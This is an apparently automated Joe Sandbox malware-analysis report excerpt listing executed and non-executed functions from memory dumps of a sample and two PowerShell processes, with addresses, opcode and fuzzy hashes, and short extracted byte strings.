Opcode ID: 9b64f9addfc80f3682949ac184c6ec1dd8d1b8ce8fb4de048fbc9d60a715423c
Instruction ID: ab73dc0d33384bf80a4b4e863d2467c2b52e9dc8e1c64cdc722a06621321af5e
Opcode Fuzzy Hash: 9b64f9addfc80f3682949ac184c6ec1dd8d1b8ce8fb4de048fbc9d60a715423c
Instruction Fuzzy Hash: 2FF08C3080968D8FDB94EF24C4512E57BA0FFA5340F040069E40CD3582DB7699A4CB84

Function 00007FF848F10528 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2184253726.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_kQyd2z80gD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e79c596d4891a14c297a1c27404ef30b39a402dab68d2747980f04ee26a768d6
Instruction ID: 192e65e4dc81af3144a3b35a526925357daf3a639379a1f0eeea14399ad06680
Opcode Fuzzy Hash: e79c596d4891a14c297a1c27404ef30b39a402dab68d2747980f04ee26a768d6
Instruction Fuzzy Hash: 53F0583080D64E8FDB95EF2494012EA77A0FF55344F04013AE40CC61C2DB39A9A0CB98

Function 00007FF848F1A470 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2184253726.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_kQyd2z80gD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd96decd7e99d75296b3489cbb476e95db2d07875ea360f83009e2a05ffa9d94
Instruction ID: e01b0c47b42157c803a0fff177442c813339098e82e858639a8ce6c3ce54ef79
Opcode Fuzzy Hash: bd96decd7e99d75296b3489cbb476e95db2d07875ea360f83009e2a05ffa9d94
Instruction Fuzzy Hash: 55E01A71F1D81B5EF6783228285407C28428B84BD1F600ABAE42FC72C5FE0C6C9223AD

Function 00007FF848F181E0 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2184253726.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_kQyd2z80gD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a654195928c034bc32c9b381b077571c0efb43db37299182faaa02d47ba4032f
Instruction ID: 8c660d2785587461da160680a3af308cbec7fd892c9cc3d735fe4538a3de5c56
Opcode Fuzzy Hash: a654195928c034bc32c9b381b077571c0efb43db37299182faaa02d47ba4032f
Instruction Fuzzy Hash: 76E09A3288C98CCFCB95AB29AC012987AA1FB89308F40026AD04CC71C1D7295E96C315

Function 00007FF848F1685C Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2184253726.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_kQyd2z80gD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39b905eb268f77152831dc1c69aa5912557a33a70a413b8c101bd9d6cb2cf477
Instruction ID: 1bdbb6ec3681483f9ddf7eb05f9b8340c37723a2040e02a33fc230cf2f92da63
Opcode Fuzzy Hash: 39b905eb268f77152831dc1c69aa5912557a33a70a413b8c101bd9d6cb2cf477
Instruction Fuzzy Hash: 68E0DF32D4CA4C8FDB55AFA9AC512D877A4FF89318F00026AD44CD71C5E7695995C306

Function 00007FF848F11F15 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2184253726.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_kQyd2z80gD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2257f17a9fd9d9cf67b9c7d27d638eb8ac018cd1ea4dee7b9f1cc7b39116aad
Instruction ID: 9281747b48df8907717f30950033fd6431478cd3175fb80d31bf12e5c4c6eb73
Opcode Fuzzy Hash: a2257f17a9fd9d9cf67b9c7d27d638eb8ac018cd1ea4dee7b9f1cc7b39116aad
Instruction Fuzzy Hash: 13E09231C1D68A4FD715BF20491A2E97F60FF51340F0915FAE448C60C3E7689568C741

Function 00007FF848F10530 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2184253726.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_kQyd2z80gD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c4c45863f7462fb8fd73c6b1feaccc993a8ca3f0149feef4b0c65d8c543abe4
Instruction ID: 273760c20addea2e89c169fc0796691882183ccff201bfa14e6335c2d529fb67
Opcode Fuzzy Hash: 8c4c45863f7462fb8fd73c6b1feaccc993a8ca3f0149feef4b0c65d8c543abe4
Instruction Fuzzy Hash: 29F0393080964D8FDB94EF14D4016AA77A0FF55344F000139E81CD21C1DB39A9A0CB88

Function 00007FF848F11C19 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2184253726.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_kQyd2z80gD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a78c3830786637f1947aa023cc00f13444e6ee9d3029ba08e0853cfdc3dd0be5
Instruction ID: 376f6fb76f6a5669459c8d34f0708d5beabb3f9f34c5e57e16b8aea46c116039
Opcode Fuzzy Hash: a78c3830786637f1947aa023cc00f13444e6ee9d3029ba08e0853cfdc3dd0be5
Instruction Fuzzy Hash: B6E0ED3184E3CE8FD716AB2048561E97F70EF12300F0911BAD048C60D3EB689958C31A

Function 00007FF848F12536 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2184253726.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_kQyd2z80gD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b9401aab3e69137de627bcd1ccb0b988d44e82702d7ff1308dc2b4e325571330
Instruction ID: a2bd004723e09658b3e86d4ab6e5fd7c735454c34f8f928b931457760169d9cb
Opcode Fuzzy Hash: b9401aab3e69137de627bcd1ccb0b988d44e82702d7ff1308dc2b4e325571330
Instruction Fuzzy Hash: FBF09871D1486E8EDBA4EB69C495BA9B7B1FB58340F1086E6900DE3245DB34AEC58F80

Function 00007FF848F18953 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2184253726.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_kQyd2z80gD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 552a6bbe50afae38c6e5b3c07b42f79e61e09a6b3cd85111586d3a9880bf7140
Instruction ID: 1c63601151ff5101c31031603375f329dedfad7a4370bca77584bf4789cf5ead
Opcode Fuzzy Hash: 552a6bbe50afae38c6e5b3c07b42f79e61e09a6b3cd85111586d3a9880bf7140
Instruction Fuzzy Hash: 1FF09270D1892D8FE794FB68889A7A8BBA1FB58744F5041AAC44DE3292DE342D818B04

Function 00007FF848F10C61 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2184253726.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_kQyd2z80gD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34cb7f1b2b41c7ed05f8f6129b411191c5c25ee675a7759ad8427dc5f48405a4
Instruction ID: 8e34cc5dbe178470c26be42fbc4cd07d8a105abc5884a29743cf6beabdd94305
Opcode Fuzzy Hash: 34cb7f1b2b41c7ed05f8f6129b411191c5c25ee675a7759ad8427dc5f48405a4
Instruction Fuzzy Hash: C1E0B631E1652D8EDB50EB58A8013EEB771FB85351F8005B5954CE2585CA3869418B45

Function 00007FF848F1D82B Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2184253726.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_kQyd2z80gD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8233bc23584a297bf5f96d7e4bd2fb70f7fd9aac8fee6d1b38645daa7cc4f470
Instruction ID: ea99be14368f9af6905c250dd3d6d95cee4481708b3c212d26f6eb79bb9f4b8f
Opcode Fuzzy Hash: 8233bc23584a297bf5f96d7e4bd2fb70f7fd9aac8fee6d1b38645daa7cc4f470
Instruction Fuzzy Hash: 35D09230A1D5178DF128BB05406023971B09F913A0F644039C05F418C2CF1CBD01A609

Function 00007FF848F1C951 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2184253726.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_kQyd2z80gD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 300340fab69ce3b27e0f27a8c3412c5addfc5bd25d51e1d8d81b9961df5788e2
Instruction ID: 6a0aed65c16cbd4d8074e5f669a8c8ff3d29cd1f5ff73b763615376b3e6d4b4a
Opcode Fuzzy Hash: 300340fab69ce3b27e0f27a8c3412c5addfc5bd25d51e1d8d81b9961df5788e2
Instruction Fuzzy Hash: 0EB09220F0C2038AE12022A0048403C00410B483C4F500630914A861D3EE482C40119C

Non-executed Functions

Function 00007FF848F106FA Relevance: 15.2, Strings: 12, Instructions: 190COMMON

Download Yara Rule

Strings

|H, xrefs: 00007FF848F107E9
O_^X, xrefs: 00007FF848F10712
O_^U, xrefs: 00007FF848F106FA
(}H, xrefs: 00007FF848F10829
8}H, xrefs: 00007FF848F10839
O_^g, xrefs: 00007FF848F1077A
H}H, xrefs: 00007FF848F10849
`~H, xrefs: 00007FF848F10859
O_^f, xrefs: 00007FF848F10772
=O_^, xrefs: 00007FF848F10701
?O_I, xrefs: 00007FF848F10804
{H, xrefs: 00007FF848F107D9

Memory Dump Source

Source File: 00000000.00000002.2184253726.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_kQyd2z80gD.jbxd

Similarity

API ID:
String ID: (}H$8}H$=O_^$?O_I$H}H$O_^U$O_^X$O_^f$O_^g$`~H${H$|H
API String ID: 0-1543447027
Opcode ID: d8dc3ea3ac0ea1eef951f9a82203ac31fd79aa17ed1425920eb3441d1e971d8c
Instruction ID: 9e382875aef03bc6ed1cacfb6570c383ec41092fe7d9809cf69a22d8dea55982
Opcode Fuzzy Hash: d8dc3ea3ac0ea1eef951f9a82203ac31fd79aa17ed1425920eb3441d1e971d8c
Instruction Fuzzy Hash: C1513873E0E5A68FE215776C7C051B82B90FFD27A1F5805F7C4488B1CBEA289C098399

Function 00007FF848F106E0 Relevance: 14.0, Strings: 11, Instructions: 212COMMON

Download Yara Rule

Strings

|H, xrefs: 00007FF848F107E9
O_^X, xrefs: 00007FF848F10712
(}H, xrefs: 00007FF848F10829
8}H, xrefs: 00007FF848F10839
O_^g, xrefs: 00007FF848F1077A
H}H, xrefs: 00007FF848F10849
`~H, xrefs: 00007FF848F10859
O_^f, xrefs: 00007FF848F10772
=O_^, xrefs: 00007FF848F10701
?O_I, xrefs: 00007FF848F10804
{H, xrefs: 00007FF848F107D9

Memory Dump Source

Source File: 00000000.00000002.2184253726.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_kQyd2z80gD.jbxd

Similarity

API ID:
String ID: (}H$8}H$=O_^$?O_I$H}H$O_^X$O_^f$O_^g$`~H${H$|H
API String ID: 0-930902922
Opcode ID: 312e44df89d287903749be90f51807fc1065965d3d5809468814eb98067db57c
Instruction ID: 4a6d4872172df41abfba38c2691d4b502194e193306f4cc0fb130482945b4595
Opcode Fuzzy Hash: 312e44df89d287903749be90f51807fc1065965d3d5809468814eb98067db57c
Instruction Fuzzy Hash: 48514833E0E5A68EE215776C7C061F92B90FFD27B1F5805B7D4488B1C7EA285C098399

Function 00007FF848F106A5 Relevance: 14.0, Strings: 11, Instructions: 205COMMON

Download Yara Rule

Strings

|H, xrefs: 00007FF848F107E9
(}H, xrefs: 00007FF848F10829
O_^K, xrefs: 00007FF848F106C9
8}H, xrefs: 00007FF848F10839
O_^g, xrefs: 00007FF848F1077A
H}H, xrefs: 00007FF848F10849
`~H, xrefs: 00007FF848F10859
O_^f, xrefs: 00007FF848F10772
?O_I, xrefs: 00007FF848F10804
O_^J, xrefs: 00007FF848F106C2
{H, xrefs: 00007FF848F107D9

Memory Dump Source

Source File: 00000000.00000002.2184253726.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_kQyd2z80gD.jbxd

Similarity

API ID:
String ID: (}H$8}H$?O_I$H}H$O_^J$O_^K$O_^f$O_^g$`~H${H$|H
API String ID: 0-3431071911
Opcode ID: 69cf27197ecccf8e90da2ed8395fa67b049eeada70f5a2abaa9238d7487628c4
Instruction ID: a39ea1bedc31df5070ea5d4b4741bd09a1e8d98301eb33a553e9e7964de92bcf
Opcode Fuzzy Hash: 69cf27197ecccf8e90da2ed8395fa67b049eeada70f5a2abaa9238d7487628c4
Instruction Fuzzy Hash: 81512B73E0E5A68FE215776C78051B82B90FFD27B1F1405B7C4488B1CBEA299C4A83D9

Function 00007FF848F14DB0 Relevance: 9.1, Strings: 7, Instructions: 337COMMON

Download Yara Rule

Strings

8XH, xrefs: 00007FF848F15018
8XH, xrefs: 00007FF848F14E42
8XH, xrefs: 00007FF848F14DEC
8XH, xrefs: 00007FF848F1504E
8XH, xrefs: 00007FF848F150D4
8XH, xrefs: 00007FF848F14FCE
8XH, xrefs: 00007FF848F14EAC

Memory Dump Source

Source File: 00000000.00000002.2184253726.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_kQyd2z80gD.jbxd

Similarity

API ID:
String ID: 8XH$8XH$8XH$8XH$8XH$8XH$8XH
API String ID: 0-2696229484
Opcode ID: 92f5df272397cdbca38ca79626698715a4fd47c79b1209edb082fb180090c27f
Instruction ID: 65f14dc251ddb31298f34d90aee2a8f491c8ef488dac070651a448d31329fb0b
Opcode Fuzzy Hash: 92f5df272397cdbca38ca79626698715a4fd47c79b1209edb082fb180090c27f
Instruction Fuzzy Hash: 1CC10431D1965ACFDB68EFA8C4546BDB7B2FF69741F1001B9D00DA3292CB38A881CB55

Function 00007FF848F13660 Relevance: 6.5, Strings: 5, Instructions: 234COMMON

Download Yara Rule

Strings

8XH, xrefs: 00007FF848F1384F
8XH, xrefs: 00007FF848F1372F
8XH, xrefs: 00007FF848F1377B
8XH, xrefs: 00007FF848F13800
8XH, xrefs: 00007FF848F136A2

Memory Dump Source

Source File: 00000000.00000002.2184253726.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_kQyd2z80gD.jbxd

Similarity

API ID:
String ID: 8XH$8XH$8XH$8XH$8XH
API String ID: 0-2822012881
Opcode ID: 6f06a4d62af0c064d6ce44db67d0875e9b6c82558272c692597e5e0a3cb519cf
Instruction ID: f25542b770906c377c30fbf0964266c5b20c7c25f95f50622c54edb3e0f8232c
Opcode Fuzzy Hash: 6f06a4d62af0c064d6ce44db67d0875e9b6c82558272c692597e5e0a3cb519cf
Instruction Fuzzy Hash: DE911071D196598FDB58EF68C490AADB7B2FF59301F60017DE04AA3291CB39A881CF54

Analysis Process: powershell.exePID: 984, Parent PID: 6780COMMON

Executed Functions

Function 00007FF849006605 Relevance: 6.7, Strings: 5, Instructions: 427COMMON

Download Yara Rule

Strings

(B%I, xrefs: 00007FF849006974
(B%I, xrefs: 00007FF8490067C3
(B%I, xrefs: 00007FF8490066ED
(B%I, xrefs: 00007FF84900678C
(B%I, xrefs: 00007FF849006858

Memory Dump Source

Source File: 00000011.00000002.3458353769.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff849000000_powershell.jbxd

Similarity

API ID:
String ID: (B%I$(B%I$(B%I$(B%I$(B%I
API String ID: 0-1877043794
Opcode ID: 6ad45507a312b8be6e5d697ef1457f88d47e6059a59e49a06f05f8b8f14527fe
Instruction ID: 570bdbd14f10007c2c2bc6bcc8cb779bb1172f66127d8458d228902df1222adb
Opcode Fuzzy Hash: 6ad45507a312b8be6e5d697ef1457f88d47e6059a59e49a06f05f8b8f14527fe
Instruction Fuzzy Hash: 91C13432D0EACA5FEB65EF28A8155B57BA2EF15754F0802FAD04DD7093EA18E805C351

Function 00007FF849004370 Relevance: 1.4, Strings: 1, Instructions: 151COMMON

Download Yara Rule

Strings

p>%I, xrefs: 00007FF8490043ED

Memory Dump Source

Source File: 00000011.00000002.3458353769.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff849000000_powershell.jbxd

Similarity

API ID:
String ID: p>%I
API String ID: 0-2206047945
Opcode ID: 730e19c573af23a3f6025fac6b85adb4bd972f5130192ae1c3d9b632dc8f376d
Instruction ID: 7fb7243e106ca2e5bc5da8d701f6c2370c65ccecff88de2ca06da4dd9da45441
Opcode Fuzzy Hash: 730e19c573af23a3f6025fac6b85adb4bd972f5130192ae1c3d9b632dc8f376d
Instruction Fuzzy Hash: 3541E332E0DA894FEBB9EA2C74516B477E1EF85660B1811FAC14DC7183FA18EC058385

Function 00007FF8490043BC Relevance: 1.3, Strings: 1, Instructions: 67COMMON

Download Yara Rule

Strings

p>%I, xrefs: 00007FF8490043ED

Memory Dump Source

Source File: 00000011.00000002.3458353769.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff849000000_powershell.jbxd

Similarity

API ID:
String ID: p>%I
API String ID: 0-2206047945
Opcode ID: de61d91b00b94141d0b25d7d09afee3c736661c824fac1db1117fe79487347c7
Instruction ID: ae8026bac3360dc44d5bd7ff37cc7d441588f299cd31fcc4165b8f39d3006897
Opcode Fuzzy Hash: de61d91b00b94141d0b25d7d09afee3c736661c824fac1db1117fe79487347c7
Instruction Fuzzy Hash: DC11CE32D0E5CA4FEBB9EE2CA8505B87BD1EF406A0B4910FAD11DC7093FA18EC448345

Function 00007FF848F39718 Relevance: .2, Instructions: 161COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.3449891084.00007FF848F35000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F35000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff848f35000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3fe30dae6959ab8773da755d8510e9678c595f236261a72469b36b5174d4f94b
Instruction ID: 756502fd40d82dec4cbcf11d21d85db86a72e98d82289c5965e6a15ecf279145
Opcode Fuzzy Hash: 3fe30dae6959ab8773da755d8510e9678c595f236261a72469b36b5174d4f94b
Instruction Fuzzy Hash: 84412931E0CB888FDB19AB6CAC466F97BE0FB55710F0441AFD059836D3DA24A856C7C6

Function 00007FF848E1E380 Relevance: .1, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.3439241082.00007FF848E1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff848e1d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5dd33fbff0d2c56f215f04bfa5504c0442c176fbd8814e211d093a7edcc7077
Instruction ID: 7c65b2401a567ba12b0372bedd6011b9eb0361254710ef6dbe3f4fecbb62cfa1
Opcode Fuzzy Hash: e5dd33fbff0d2c56f215f04bfa5504c0442c176fbd8814e211d093a7edcc7077
Instruction Fuzzy Hash: 2B41267080DBC54FE79A9B28A8419523FF0FF52350F1502EFE089CB1A3DB25A846C792

Function 00007FF848F3A49C Relevance: .1, Instructions: 103COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.3449891084.00007FF848F35000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F35000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff848f35000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d68dd0031bb373592b04138cfc9f42c3a95d70059448477f365863ab72e6814
Instruction ID: 83b0dfff7ec2f4a15c94f70a4dce7cc6d7e9282589a0c4e86380af311d90aab1
Opcode Fuzzy Hash: 1d68dd0031bb373592b04138cfc9f42c3a95d70059448477f365863ab72e6814
Instruction Fuzzy Hash: 1A21F83190CB4C4FEB59DFAC984A7E97FF0EB96321F04416BD448C3192DA74A85ACB91

Function 00007FF848F333B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.3449891084.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff848f30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e44b818a4b2080887c4be8e7882f12c58e6a937c8fac118203de3facf441d416
Instruction ID: 1fde1e7c06bd8ad01fde8fdacf519f27676798cf7977af127a8e772823c5939c
Opcode Fuzzy Hash: e44b818a4b2080887c4be8e7882f12c58e6a937c8fac118203de3facf441d416
Instruction Fuzzy Hash: 9501677111CB0C4FD744EF0CE451AA5B7E0FB95364F10056EE58AC3695DB36E882CB45

Function 00007FF849004143 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.3458353769.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff849000000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e7344d2bf1019af5ee561223d27e85a6ee5e98a7e84f26f01e7ff0734a165db
Instruction ID: d3c6fed0e7efc8abd4ea11470eaa89104f97b7a6937dbe9ee09b4868e343da61
Opcode Fuzzy Hash: 4e7344d2bf1019af5ee561223d27e85a6ee5e98a7e84f26f01e7ff0734a165db
Instruction Fuzzy Hash: E5F0CD32A0D9858FDBA9EE1CF8454E8B7E5EF59360B1900FAD14DC7063FA26EC858744

Function 00007FF848F39CF8 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.3449891084.00007FF848F35000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F35000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff848f35000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8522be662a2ed5b6a5bb9fc4c0007a505301ac44333270fcf3fb820a5efd55ee
Instruction ID: a91185d0a22b7161203c533c9dff6601346ccfb87127ed12e2b01d1ad47a603d
Opcode Fuzzy Hash: 8522be662a2ed5b6a5bb9fc4c0007a505301ac44333270fcf3fb820a5efd55ee
Instruction Fuzzy Hash: 5CF0B43180C68D4FEB46EF28885A5D57FA0EF17251F04029BE458C75A2DB659458CB82

Function 00007FF8490041D1 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.3458353769.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff849000000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
Instruction ID: c35c486b478612a7d6b0b66b499078fd92c76872f7a3e98c68b3026501c1cf2a
Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
Instruction Fuzzy Hash: 5DE01A31B0C8089FDB78EE0CF0409E973E5EB9836175101FBD14EC7562EA22EC518B84

Non-executed Functions

Function 00007FF848F384E3 Relevance: 6.4, Strings: 5, Instructions: 109COMMON

Download Yara Rule

Strings

L_^, xrefs: 00007FF848F38502
L_^, xrefs: 00007FF848F38522
L_^, xrefs: 00007FF848F38572
L_^, xrefs: 00007FF848F385C2
L_^, xrefs: 00007FF848F38562

Memory Dump Source

Source File: 00000011.00000002.3449891084.00007FF848F35000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F35000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff848f35000_powershell.jbxd

Similarity

API ID:
String ID: L_^$L_^$L_^$L_^$L_^
API String ID: 0-2264858084
Opcode ID: 4dc3ba28c602ef8301a3b1d81de715ec9345921ee02444e454e563387205e993
Instruction ID: ec47ca417e6aed8f0aa044a7d78e4125fe05efd40f487d8839d9d8365d08f562
Opcode Fuzzy Hash: 4dc3ba28c602ef8301a3b1d81de715ec9345921ee02444e454e563387205e993
Instruction Fuzzy Hash: AB316073D2D6C64FE397533958650986F90EF53668B5E00EBC0C84F493EF19680A9305

Analysis Process: powershell.exePID: 348, Parent PID: 6780COMMON

Executed Functions

Function 00007FF848FE6605 Relevance: 6.7, Strings: 5, Instructions: 433COMMON

Download Yara Rule

Strings

(B#I, xrefs: 00007FF848FE67C3
(B#I, xrefs: 00007FF848FE6974
(B#I, xrefs: 00007FF848FE66ED
(B#I, xrefs: 00007FF848FE6858
(B#I, xrefs: 00007FF848FE678C

Memory Dump Source

Source File: 00000012.00000002.3430737275.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff848fe0000_powershell.jbxd

Similarity

API ID:
String ID: (B#I$(B#I$(B#I$(B#I$(B#I
API String ID: 0-1620291718
Opcode ID: 14194311a7ac834e1de296e55accc593ac75b09643db5470ecf810b1d2747575
Instruction ID: 4b08ca6a9cffbfe123aa740488284a11c8d26e47eec923b99b12762259aa1ef7
Opcode Fuzzy Hash: 14194311a7ac834e1de296e55accc593ac75b09643db5470ecf810b1d2747575
Instruction Fuzzy Hash: 62D10F31D1EA8E5FEBA5AB2898545B5BBA0EF16390F1801FAD40DCB0D3EA1DAC05C355

Function 00007FF848FE4370 Relevance: 1.4, Strings: 1, Instructions: 151COMMON

Download Yara Rule

Strings

p>#I, xrefs: 00007FF848FE43ED

Memory Dump Source

Source File: 00000012.00000002.3430737275.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff848fe0000_powershell.jbxd

Similarity

API ID:
String ID: p>#I
API String ID: 0-3576117583
Opcode ID: 22451844f92913e054f667a9c1f669a020c382b91096e3816e4ee188ae035fd6
Instruction ID: a1502422c784787e22de41080f12c6edfe4f9a404c8cf6744595e9ce9f83c4d6
Opcode Fuzzy Hash: 22451844f92913e054f667a9c1f669a020c382b91096e3816e4ee188ae035fd6
Instruction Fuzzy Hash: DD411432E0DE894FE7A9EB2C68106B477E1EF64660F0801BEC54DC70D7EA1CAC118385

Function 00007FF848FE43BC Relevance: 1.3, Strings: 1, Instructions: 67COMMON

Download Yara Rule

Strings

p>#I, xrefs: 00007FF848FE43ED

Memory Dump Source

Source File: 00000012.00000002.3430737275.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff848fe0000_powershell.jbxd

Similarity

API ID:
String ID: p>#I
API String ID: 0-3576117583
Opcode ID: 6ca33de618e6f2fb6c32de96da95bb644efaf491a9960b09c7c79cedb5c2bce7
Instruction ID: bbad4e90a07c291e40aa369fe005c9c808fe1738c569c15b9b01fd581f700b18
Opcode Fuzzy Hash: 6ca33de618e6f2fb6c32de96da95bb644efaf491a9960b09c7c79cedb5c2bce7
Instruction Fuzzy Hash: F411C132E0EA854FE7A5EB2C98505B87BD1FF60660F5800BED41DC74D2DB1CAC508385

